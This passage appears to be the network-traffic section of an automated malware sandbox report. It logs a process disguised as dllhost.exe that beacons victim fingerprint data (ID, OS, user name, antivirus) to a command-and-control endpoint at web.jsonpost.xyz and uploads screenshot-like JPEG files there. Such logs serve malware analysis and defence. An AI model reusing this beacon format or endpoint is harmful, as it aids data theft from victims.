                                                                                Data Ascii: IO(jG~&2qJO%g,mz-~'cEqzm?/TO!g?!;+Mr\0p?[eFF_C];?>q8{8/e(3EQZ1V!c":iSkO?/;?_#&K?
                                                                                Nov 29, 2024 01:53:19.605210066 CET2472OUTData Raw: cf 6e 6b a2 cc e7 b9 19 a2 9c 41 1d a9 29 0c 4a 4a 5a 28 01 28 a5 a4 ef 4c 62 1a 29 69 28 01 28 a5 a0 d0 31 29 29 68 a0 62 51 45 14 00 52 52 d0 68 01 b4 52 d1 40 c6 d1 4b 8c d2 53 18 94 52 e2 8a 02 e2 51 4b 45 20 12 8f c2 8a 28 01 29 0d 2d 14 0c
                                                                                Data Ascii: nkA)JJZ((Lb)i((1))hbQERRhR@KSRQKE ()-J(4P0sX5ozX/EWTQEW-(K,$c+8 A=:xg\YdUs$'}?Wu+;(dp4*cThsepG\vW5[
                                                                                Nov 29, 2024 01:53:19.605221033 CET2472OUTData Raw: bf d9 a6 ff 00 9f eb 8f fb e6 3f fe 26 8f b3 4d ff 00 3f d7 1f f7 cc 7f fc 4d 00 58 a2 ab fd 9a 6f f9 fe b8 ff 00 be 63 ff 00 e2 69 3e cd 37 fc ff 00 5c 7f df 31 ff 00 f1 34 01 66 8a ad f6 69 bf e7 fa e3 fe f9 8f ff 00 89 a3 ec b3 7f cf f5 c7 fd
                                                                                Data Ascii: ?&M?MXoci>7\14fi@hf?>7\14EV4q|i4[G?&,U714}och[G?&,W
                                                                                Nov 29, 2024 01:53:19.605293036 CET4944OUTData Raw: 90 1c 80 00 c8 5c 9c 8d ce a7 f8 0d 53 b7 d0 f5 ab 3d 02 37 b6 d2 f5 53 7b a8 2b 42 d2 a5 a3 b0 b6 84 1c 48 49 0a 70 ce 41 5f 5d bb bf bc 2a 49 74 eb 59 a4 32 49 18 66 3d cd 57 4d 0e ca 26 2c 88 ca 4f 7c d7 9b 5b 01 56 75 25 25 25 69 6f e8 bf ad
                                                                                Data Ascii: \S=7S{+BHIpA_]*ItY2If=WM&,O|[Vu%%%ioO^gF(;zAq ks]/|n%S9vp&qj+r|v-9ASYmedY_+'TnOtuQ}!|>5e:o,Mgs[
                                                                                Nov 29, 2024 01:53:19.605416059 CET2472OUTData Raw: 6e 6d 1f 5e a7 91 9a e1 a9 e2 29 b8 54 fb 3a ab 7a 68 79 05 26 29 68 af b7 3f 3b 13 14 52 d2 50 01 5e 9b f0 e7 fe 45 fb 9f fa fb 6f fd 01 2b c8 f5 7f f8 f4 5f f7 c7 f2 34 9a 67 86 ef 35 7d 22 ff 00 50 b4 96 dd 85 88 dd 2c 05 8f 9a 57 19 dc 06 30
                                                                                Data Ascii: nm^)T:zhy&)h?;RP^Eo+_4g5}"P,W0G^|sJnWjs(o;whV:"^1tW7O>pbC^ytejzdzU399A;S<EGGWUQ
                                                                                Nov 29, 2024 01:53:19.605475903 CET2472OUTData Raw: b8 09 45 18 a4 c5 05 0b 9c 53 84 87 bf 23 de 99 45 31 59 0f fd db 75 5c 7b 8a 6f 92 0f dd 7f c0 d2 51 45 90 f5 18 d1 3a f5 14 ca b0 1c 8e f4 a5 c3 7d e5 06 95 87 cc ca d4 54 e6 38 db a1 23 eb 4c 68 1f f8 7e 61 ed 4a c5 29 22 33 48 7a 52 90 47 51
                                                                                Data Ascii: ES#E1Yu\{oQE:}T8#Lh~aJ)"3HzRGQ9hmE-%%-(4CIKI@bL"NhI@41)RwaG.)MF))!KI4:w1;Sq)bzR(?-'oN)JN


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                104192.168.2.44989572.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:20.124274969 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                105192.168.2.44989772.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:20.241677999 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:20.241677999 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:20.241772890 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:20.241796970 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:20.364435911 CET7416OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:20.364566088 CET13596OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:53:20.364588976 CET2472OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:53:20.484663963 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS
                                                                                Nov 29, 2024 01:53:20.484783888 CET4944OUTData Raw: 1d 09 af 3b db 62 7f e7 e3 ff 00 c0 bf e0 9e c7 d5 70 7f f3 e9 7f e0 3f f0 0f 2f d4 74 eb 8d 32 ed ad ae 17 0c bd 08 e8 c3 d4 55 4a ed bc 51 02 cd e1 9b 2d 4c 5d 4f 32 ce 63 68 c4 c9 18 2a ae a5 bf 84 75 e9 df 15 c4 d7 d1 e0 71 12 af 4a f3 5a a7
                                                                                Data Ascii: ;bp?/t2UJQ-L]O2ch*uqJZcs\$0iu((JZ(QE%QEQELQEQEQEJ(@)(QAQECEPIKI%-%;QEQIK@QEE0(%-(0J(J)))i(-%R)
                                                                                Nov 29, 2024 01:53:20.525902033 CET28428OUTData Raw: 2b 48 ed 10 48 b1 e9 67 ca b1 67 2e 45 cc 4c 3e 66 c7 45 60 e3 70 e9 f2 b0 1f c2 29 c3 1d 8a 93 b5 ba f6 e9 df fa f5 15 4c b3 03 15 74 f6 5d fa db 6f eb d0 db 86 71 31 41 98 e3 77 79 90 24 ac 54 93 14 65 e4 e0 03 f7 40 03 ea 47 be 11 ae 55 22 66
                                                                                Data Ascii: +HHgg.EL>fE`p)Lt]oq1Awy$Te@GU"fI#RXws9L,Y @sg9=}+2wuEsEvhDNy!]'#skqotrg5ey#jeITV.%)e`?N
                                                                                Nov 29, 2024 01:53:20.652564049 CET12360OUTData Raw: a2 80 0a 28 a2 80 0a 28 a2 80 0a 5e 29 29 79 a0 02 92 96 92 80 16 8a 29 28 01 78 a2 92 8a 04 2d 14 94 50 02 f1 45 25 14 86 14 51 45 00 14 51 45 00 14 51 45 00 14 94 51 4c 02 8a 28 a2 e0 14 51 45 20 0a 28 a2 81 85 25 2d 25 30 0a 28 a2 90 05 21 a5
                                                                                Data Ascii: ((^))y)(x-PE%QEQEQEQL(QE (%-%0(!4())i((RRS(4(J(4JZJQE%whQ@EwbQEQE1hRQEfasHM%%-%3E%(RQE;3IKM'ibiaZn)(%Qq6


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                106192.168.2.44989872.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:21.546031952 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                107192.168.2.44989972.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:21.789654970 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:21.789705038 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:21.789781094 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:21.789805889 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:21.909938097 CET7416OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:21.910020113 CET2472OUTData Raw: 61 d6 75 4d 7a e8 4e fa 58 f3 dd ae b9 fb 3c 96 85 48 45 56 e8 78 2a a1 41 c8 38 18 18 e3 30 59 ea 3a bd a5 b6 a5 69 f6 a9 74 b8 b4 e8 84 12 5b 82 52 de 45 8c 79 a1 c8 e2 36 df b9 8e 71 9c 83 d0 d5 98 f4 c4 b6 b9 4b ab 29 e7 b4 b8 4c ed 96 09 0a
                                                                                Data Ascii: auMzNX<HEVx*A80Y:it[REy6qK)L2`5`ziY/3YA;l&]OMZXEY~o*U0n97\"YMUl4K;EFzl`<XJ3vylH;J},s[
                                                                                Nov 29, 2024 01:53:21.910020113 CET2472OUTData Raw: 45 14 50 30 a2 8a 29 00 94 52 d1 40 09 45 14 50 02 1a 0d 2d 14 00 94 51 45 00 25 14 b4 94 c6 14 51 45 00 25 14 b4 53 01 29 29 68 c5 03 42 52 52 d1 40 c4 a2 8a 29 80 51 46 28 e2 80 0c 91 4e 0e 40 a6 d1 8a 60 38 ed 6e ab f9 53 4c 4a 7e eb 63 eb 49
                                                                                Data Ascii: EP0)R@EP-QE%QE%S))hBRR@)QF(N@`8nSLJ~cI9bv1wh(ZiR+qVE6)))hR@4P1(JCKE1EJLS6RRKAqIu%1N%!)P1@%:(RbLP11II
                                                                                Nov 29, 2024 01:53:21.910202980 CET4944OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:53:21.910243988 CET2472OUTData Raw: 26 29 31 8a 71 e0 52 1a 56 18 dc 51 c7 34 bf a1 a4 f5 fe 54 58 62 63 23 14 df 7a 79 1c 8c 52 51 61 8d e9 47 bd 3b 14 86 81 88 41 a3 8a 5c 67 ff 00 af 4d ed 4c 35 13 de 8e 73 4e 20 52 1e 28 01 31 8a 00 f7 a7 0c 1f 6a 41 40 c4 23 f9 d3 7f 5a 71 39
                                                                                Data Ascii: &)1qRVQ4TXbc#zyRQaG;A\gML5sN R(1jA@#Zq9j%(HE/GCX/z:GZ\q@/CE!:I@4RENwb|Q@Q@EJ)MQEQE%@CE-QEQERPIKE%Q@Q@P
                                                                                Nov 29, 2024 01:53:21.910243988 CET3708OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:53:22.030021906 CET4944OUTData Raw: 70 32 a4 11 83 d4 73 59 8b 05 cc 52 69 eb a7 59 3d bd 9d 93 4c ef 05 dc de 71 b9 32 a8 47 0e ca a9 f2 94 01 40 00 63 93 9c d3 a4 b7 b8 11 5b c3 a3 db 4f a7 88 2e 63 ba 32 dc 4e 26 91 9e 3c f9 6b 90 aa 02 8c 93 8c 64 93 c9 e8 2b c8 e6 c7 37 75 7e
                                                                                Data Ascii: p2sYRiY=Lq2G@c[O.c2N&<kd+7u~oO,Q2t[tx>$[b((r<M"4`qHbOrZ\ZZ[%t~d r\]Amf+i,6{W.|98QR+KSHS


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                108192.168.2.44990572.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:22.998848915 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                109192.168.2.44990672.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:23.268933058 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----b3714476196bb616692c6ded08e7aac7
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98018
                                                                                Cache-Control: no-cache
                                                                                Nov 29, 2024 01:53:23.268969059 CET156OUTData Raw: 2d 2d 2d 2d 2d 2d 62 33 37 31 34 34 37 36 31 39 36 62 62 36 31 36 36 39 32 63 36 64 65 64 30 38 65 37 61 61 63 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                                Data Ascii: ------b3714476196bb616692c6ded08e7aac7Content-Disposition: form-data; name="data"; filename="152122461226.jpg"Content-Type: application/octet-stream
                                                                                Nov 29, 2024 01:53:23.269062042 CET10240OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                                Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                                Nov 29, 2024 01:53:23.269144058 CET1236OUTData Raw: fb 52 6c f4 34 05 c8 cd 14 e2 ac 3b 53 69 0c 28 a2 8a 00 43 45 14 50 30 a4 34 b4 9c d0 01 45 14 50 00 69 29 68 c5 03 12 8a 28 a0 04 34 52 d1 40 c4 a2 8a 28 01 0d 14 b4 94 00 52 1a 5a 28 18 94 50 68 a0 04 c1 a2 96 8e d4 c6 25 25 2d 21 a0 02 8a 28
                                                                                Data Ascii: Rl4;Si(CEP04EPi)h(4R@(RZ(Ph%%-!(0QE'j)i(4um!(bQEJJu%((PhE!S1E(RwhJ(F)h@RPEE8cKI@0Ri/Z(CE=(4
                                                                                Nov 29, 2024 01:53:23.430887938 CET4944OUTData Raw: de 49 69 75 19 8e 58 ce 08 3d fd c7 b5 6f 43 1f 42 bc b9 20 f5 39 f1 39 6e 23 0f 0e 79 ad 3c 8a b4 77 a3 14 57 61 c0 21 a2 96 92 80 0a 43 4b 45 03 12 8a 28 a0 02 92 96 8a 06 25 21 a5 a2 80 12 83 4b 49 4c 04 a2 96 8a 06 25 25 2d 25 03 0a 4a 5a 28
                                                                                Data Ascii: IiuX=oCB 99n#y<wWa!CKE(%!KIL%%-%JZ((%CE-%%(4P1))h4P1(4Q@RbBRSHhRP1%:JJZ()iJZJ))h))i())JJZ(<^hNZObPhiB9"ByP0%Nih#
                                                                                Nov 29, 2024 01:53:23.430958986 CET7416OUTData Raw: fc 81 27 ff 00 13 47 fc 26 fe 1d ff 00 a0 87 fe 40 93 ff 00 89 af 24 6b 6b 95 b3 17 8d 6b 70 2d 4f 49 cc 2d e5 9e 71 f7 b1 8e be f4 d8 e1 9e 6b 79 6e 21 b7 9e 58 21 cf 9b 2c 71 33 22 60 64 e4 81 81 c7 ad 73 7f 64 50 b5 fd a7 e4 75 7f 6e 62 6f 6f
                                                                                Data Ascii: 'G&@$kkkp-OI-qkyn!X!,q3"`dsdPunbooe)NxnMWuI:^o@tI8?!w0*3d~uqs1uqrRm`<(yyWn8IjRE_|k!u#FR_[xAm,V
                                                                                Nov 29, 2024 01:53:23.430958986 CET7416OUTData Raw: a9 07 fe f9 af 76 85 92 86 ba f3 7f 91 e5 e3 6e f9 f4 d3 95 7e 47 90 51 4b da 92 be d4 fc d8 28 a2 8a 00 cf d5 ff 00 e3 d1 7f eb a0 fe 46 b7 be 1b 43 35 b6 a5 79 ad cb 29 87 4c b2 b7 7f b5 12 32 24 04 70 9e e7 a1 fc 07 ad 63 6a 30 49 71 6e ab 12
                                                                                Data Ascii: vn~GQK(FC5y)L2$pcj0Iqn`8j}3,4!M?.c.0yRW4<veRr")no,5$tu`rt=1xSR]/U)}we7<p+bDmBy?z/P|=5gi
                                                                                Nov 29, 2024 01:53:23.430984974 CET1236OUTData Raw: b4 50 01 8a 31 45 14 0c 4a 4a 75 25 08 04 a2 8a 51 4c 02 93 14 b4 50 02 77 a2 97 14 94 c6 18 a4 c7 34 b8 a2 98 09 45 2d 14 00 94 98 a5 a3 19 a6 02 52 53 e9 31 45 c6 37 9a 33 ff 00 d6 a5 a3 14 0c 4c e3 a5 2e 73 f7 80 3f 5a 31 48 45 00 21 8e 36 f5
                                                                                Data Ascii: P1EJJu%QLPw4E-RS1E73L.s?Z1HE!6SL00aRbP4 e# UN9JWJw)Lz1Q2tRLS9L|~qAS1I?1EGf&FFi1GzVH#E+`O9!`jp9
                                                                                Nov 29, 2024 01:53:23.663366079 CET6180OUTData Raw: 0f 80 f5 1d 88 88 3c d4 e1 2c 24 b4 1f 7d 3f 81 f9 3f 5e 9d bb 57 9b d7 a9 78 a2 c6 1d 3f c1 77 f1 42 f7 0c a5 e3 62 67 b8 92 66 cf 98 9f c4 ec 4e 38 e9 9c 57 97 57 6e 50 f9 a3 37 e6 78 1c 42 b9 6a 53 5e 42 51 4b 45 7b 07 ce 89 45 29 a4 a0 62 51
                                                                                Data Ascii: <,$}??^Wx?wBbgfN8WWnP7xBjS^BQKE{E)bQKI@QL(0(1PQPIKI@`%(L(4Q@E-%1!4QE))i()))h((QERZ)QE0(Q@PhSH)QERRLb-'z`
                                                                                Nov 29, 2024 01:53:23.663420916 CET18540OUTData Raw: 2d 25 14 50 30 34 51 49 40 05 14 51 4c 02 8a 28 a0 62 71 46 28 a2 80 12 82 29 68 a6 03 71 46 29 68 a6 31 31 45 3b 8a 38 a0 06 d2 11 4e a3 14 00 c1 4b 4b 8e d4 62 98 ee 36 8a 75 14 20 1b 45 2e 29 31 40 c2 8a 29 40 27 a0 27 e9 45 d0 c4 a3 15 22 db
                                                                                Data Ascii: -%P04QI@QL(bqF()hqF)h11E;8NKKb6u E.)1@)@''E""3qt)P}9FRub;ZM=aO){T2@jxV?Zv3Eq4`QXv?AR85cEO4KcKFdE0Rij<_j8/M
                                                                                Nov 29, 2024 01:53:23.829129934 CET25956OUTData Raw: a2 98 05 14 51 40 09 4b 5e af 71 66 b2 12 f1 e1 5f d3 b1 aa 8b 95 24 11 82 0e 08 af 8c 9f 16 b8 bd 68 ff 00 e4 df fd a9 f6 ab 84 13 ff 00 97 df f9 2f ff 00 6c 79 9e 28 af 54 43 5e 6d aa 7f c8 5e f7 fe bb bf fe 84 6b d5 ca 33 bf ed 19 ca 1c 9c b6
                                                                                Data Ascii: Q@K^qf_$h/ly(TC^m^k3W<$g9VS((kp$o1QTe aGh+UFt^zQ8.%:VWi]]9oFU@hk_~4zWJnp|8


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                110192.168.2.44991172.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:24.483777046 CET235OUTPOST /sj2vMs/index.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 82
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 69 64 3d 31 35 32 31 32 32 34 36 31 32 32 36 26 76 73 3d 32 2e 37 31 26 73 64 3d 39 39 34 35 39 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                Data Ascii: id=152122461226&vs=2.71&sd=99459a&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                111192.168.2.44991372.52.178.23807608C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 29, 2024 01:53:24.709474087 CET195OUTPOST /sj2vMs/index.php?scr=1 HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----edaa48f9ea7e20f29ead8fcbe5fb1f54
                                                                                Host: web.jsonpost.xyz
                                                                                Content-Length: 98554
                                                                                Cache-Control: no-cache
